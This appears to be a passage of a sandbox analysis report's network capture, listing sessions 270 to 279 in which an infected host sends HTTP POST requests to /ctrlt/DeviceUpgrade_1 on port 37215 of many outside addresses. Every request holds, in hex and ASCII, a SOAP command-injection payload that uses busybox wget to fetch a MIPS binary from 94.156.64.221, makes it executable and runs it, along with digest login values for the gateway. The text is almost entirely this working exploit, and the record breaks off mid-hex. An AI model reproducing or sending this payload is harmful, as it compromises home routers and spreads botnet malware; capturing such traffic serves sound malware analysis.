                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    270192.168.2.236060841.55.10.21737215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.254889965 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    271192.168.2.2346710197.109.223.5937215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.254926920 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    272192.168.2.2356050156.13.177.9337215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.254976034 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    273192.168.2.2340604197.85.240.3737215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.254997015 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    274192.168.2.233987441.147.35.7137215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.255074978 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    275192.168.2.2335932156.240.0.4337215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.255124092 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    276192.168.2.235671841.45.246.3937215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.255199909 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    277192.168.2.2340978156.158.221.16737215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.255234957 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    278192.168.2.2352168156.32.96.16037215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.255440950 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    279192.168.2.2357988156.149.206.6537215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.255481958 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 